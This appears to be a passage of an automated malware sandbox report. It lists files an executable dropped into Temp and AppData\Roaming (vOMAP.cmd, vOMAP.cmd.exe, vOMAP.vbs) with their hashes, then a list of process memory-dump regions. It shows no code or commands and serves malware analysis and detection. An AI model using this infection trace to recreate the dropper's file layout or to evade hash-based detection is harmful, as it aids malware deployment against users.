C:\Users\Admin\AppData\Local\Temp\qncclj1u.wp5.exe

Filesize
198KB

MD5
4f5f5a3769bd12f19c71517f77a55fa2

SHA1
522615ddf24590921787177d90c2f55049ae326e

SHA256
b76bb8d0107a1c6253cc14ae472cc655136f187744210838cfb2eefe70c96eb6

SHA512
1c463b5d81a083ac2e6943a2ff2597a791d80d247bb7f5d7d23ac67c0a9c9dec51a2e6d1da1db736a3dea8079d32e30cd67205798a055472e53b0abb1c76a5db

Download Submit
C:\Users\Admin\AppData\Roaming\vOMAP.cmd

Filesize
3.3MB

MD5
6d3bc827d3ee74ac36cfe4fa25b56af1

SHA1
09f618ed800b03879d2c545607d349e5998604c4

SHA256
9cd61c9f15d24cf7aeeb74c78353daa96a75afb1610e5abaef79e5b777c84135

SHA512
5157e218ff08a04412423ce9a9c16f891005d6b99bea640dd44c4afb3afd307d0931184f7336a3a6b83ea8dc47c3d4b3370f94915e580b3bc74e93cf6f0427f2

Download Submit
C:\Users\Admin\AppData\Roaming\vOMAP.cmd.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\vOMAP.cmd.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\vOMAP.cmd.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\vOMAP.vbs

Filesize
112B

MD5
96fdff6a58de52e55f47a18ba2165417

SHA1
4b1f6925b2d95c96d528dd8333ab127ef28e55a0

SHA256
e608c056ff49f0250e57ce36af423ae4c5087f5f9a103b7a796eff02f18a5e9e

SHA512
e1da84da5fd5f286e55a0d39c38beb2a6f61030fe9271f38fe1469ae068e9c11d124c288ebbd95049b4f8da834533d57f2f88edc81281eae1df0bf31328254e6

Download Submit
memory/556-249-0x0000000004FC0000-0x0000000004FD0000-memory.dmp

Filesize
64KB

Download
memory/556-248-0x0000000004FC0000-0x0000000004FD0000-memory.dmp

Filesize
64KB

Download
memory/556-286-0x000000007F550000-0x000000007F560000-memory.dmp

Filesize
64KB

Download
memory/556-275-0x0000000070760000-0x00000000707AC000-memory.dmp

Filesize
304KB

Download
memory/556-287-0x0000000004FC0000-0x0000000004FD0000-memory.dmp

Filesize
64KB

Download
memory/668-351-0x0000000005B50000-0x0000000005B60000-memory.dmp

Filesize
64KB

Download
memory/668-247-0x0000000005C00000-0x0000000005C92000-memory.dmp

Filesize
584KB

Download
memory/668-267-0x0000000006080000-0x000000000608A000-memory.dmp

Filesize
40KB

Download
memory/668-273-0x0000000005B50000-0x0000000005B60000-memory.dmp

Filesize
64KB

Download
memory/668-285-0x0000000005B50000-0x0000000005B60000-memory.dmp

Filesize
64KB

Download
memory/668-246-0x0000000006270000-0x0000000006814000-memory.dmp

Filesize
5.6MB

Download
memory/668-245-0x0000000000FC0000-0x00000000012CC000-memory.dmp

Filesize
3.0MB

Download
memory/668-272-0x0000000006180000-0x000000000621C000-memory.dmp

Filesize
624KB

Download
memory/668-354-0x0000000005B50000-0x0000000005B60000-memory.dmp

Filesize
64KB

Download
memory/1552-315-0x0000000002BD0000-0x0000000002BE0000-memory.dmp

Filesize
64KB

Download
memory/1552-311-0x0000000002BD0000-0x0000000002BE0000-memory.dmp

Filesize
64KB

Download
memory/1552-312-0x0000000002BD0000-0x0000000002BE0000-memory.dmp

Filesize
64KB

Download
memory/2180-368-0x0000000070760000-0x00000000707AC000-memory.dmp

Filesize
304KB

Download
memory/2180-378-0x000000007FD50000-0x000000007FD60000-memory.dmp

Filesize
64KB

Download
memory/2180-367-0x00000000050C0000-0x00000000050D0000-memory.dmp

Filesize
64KB

Download
memory/2180-365-0x00000000050C0000-0x00000000050D0000-memory.dmp

Filesize
64KB

Download
memory/2772-339-0x0000000002C20000-0x0000000002C30000-memory.dmp

Filesize
64KB

Download
memory/2772-338-0x0000000002C20000-0x0000000002C30000-memory.dmp

Filesize
64KB

Download
memory/3000-182-0x0000000003200000-0x0000000003210000-memory.dmp

Filesize
64KB

Download
memory/3000-156-0x00000000076E0000-0x00000000076FA000-memory.dmp

Filesize
104KB

Download
memory/3000-153-0x00000000066F0000-0x000000000670E000-memory.dmp

Filesize
120KB

Download
memory/3000-198-0x0000000003200000-0x0000000003210000-memory.dmp

Filesize
64KB

Download
memory/3000-143-0x00000000060B0000-0x0000000006116000-memory.dmp

Filesize
408KB

Download
memory/3000-140-0x0000000003200000-0x0000000003210000-memory.dmp

Filesize
64KB

Download
memory/3000-141-0x0000000005830000-0x0000000005852000-memory.dmp

Filesize
136KB

Download
memory/3000-154-0x0000000003200000-0x0000000003210000-memory.dmp

Filesize
64KB

Download
memory/3000-155-0x0000000007D40000-0x00000000083BA000-memory.dmp

Filesize
6.5MB

Download
memory/3000-137-0x0000000003270000-0x00000000032A6000-memory.dmp

Filesize
216KB

Download
memory/3000-139-0x0000000003200000-0x0000000003210000-memory.dmp

Filesize
64KB

Download
memory/3000-138-0x0000000005A10000-0x0000000006038000-memory.dmp

Filesize
6.2MB

Download
memory/3000-180-0x0000000003200000-0x0000000003210000-memory.dmp

Filesize
64KB

Download
memory/3000-142-0x00000000058D0000-0x0000000005936000-memory.dmp

Filesize
408KB

Download
memory/3136-250-0x0000000005320000-0x0000000005330000-memory.dmp

Filesize
64KB

Download
memory/3136-318-0x0000000005320000-0x0000000005330000-memory.dmp

Filesize
64KB

Download
memory/3136-258-0x0000000005320000-0x0000000005330000-memory.dmp

Filesize
64KB

Download
memory/4484-178-0x0000000002470000-0x0000000002480000-memory.dmp

Filesize
64KB

Download
memory/4484-177-0x0000000002470000-0x0000000002480000-memory.dmp

Filesize
64KB

Download
memory/4484-232-0x0000000002470000-0x0000000002480000-memory.dmp

Filesize
64KB

Download
memory/4484-313-0x0000000006110000-0x0000000006132000-memory.dmp

Filesize
136KB

Download
memory/4484-233-0x0000000002470000-0x0000000002480000-memory.dmp

Filesize
64KB

Download
memory/4516-228-0x000000007F020000-0x000000007F030000-memory.dmp

Filesize
64KB

Download
memory/4516-227-0x0000000004D30000-0x0000000004D40000-memory.dmp

Filesize
64KB

Download
memory/4516-215-0x0000000004D30000-0x0000000004D40000-memory.dmp

Filesize
64KB

Download
memory/4516-216-0x0000000070760000-0x00000000707AC000-memory.dmp

Filesize
304KB

Download
memory/4880-197-0x00000000079D0000-0x0000000007A66000-memory.dmp

Filesize
600KB

Download
memory/4880-195-0x00000000069B0000-0x00000000069CE000-memory.dmp

Filesize
120KB

Download
memory/4880-201-0x0000000007A70000-0x0000000007A78000-memory.dmp

Filesize
32KB

Download
memory/4880-200-0x0000000007A90000-0x0000000007AAA000-memory.dmp

Filesize
104KB

Download
memory/4880-199-0x0000000007980000-0x000000000798E000-memory.dmp

Filesize
56KB

Download
memory/4880-179-0x00000000050F0000-0x0000000005100000-memory.dmp

Filesize
64KB

Download
memory/4880-181-0x0000000007630000-0x0000000007662000-memory.dmp

Filesize
200KB

Download
memory/4880-183-0x00000000050F0000-0x0000000005100000-memory.dmp

Filesize
64KB

Download
memory/4880-184-0x000000007F850000-0x000000007F860000-memory.dmp

Filesize
64KB

Download
memory/4880-185-0x0000000070760000-0x00000000707AC000-memory.dmp

Filesize
304KB

Download
memory/4880-196-0x00000000077C0000-0x00000000077CA000-memory.dmp

Filesize
40KB

Download
memory/5096-341-0x0000000070760000-0x00000000707AC000-memory.dmp

Filesize
304KB

Download
memory/5096-340-0x0000000005290000-0x00000000052A0000-memory.dmp

Filesize
64KB

Download
memory/5096-353-0x0000000005290000-0x00000000052A0000-memory.dmp

Filesize
64KB

Download
memory/5096-352-0x000000007F740000-0x000000007F750000-memory.dmp

Filesize
64KB

Download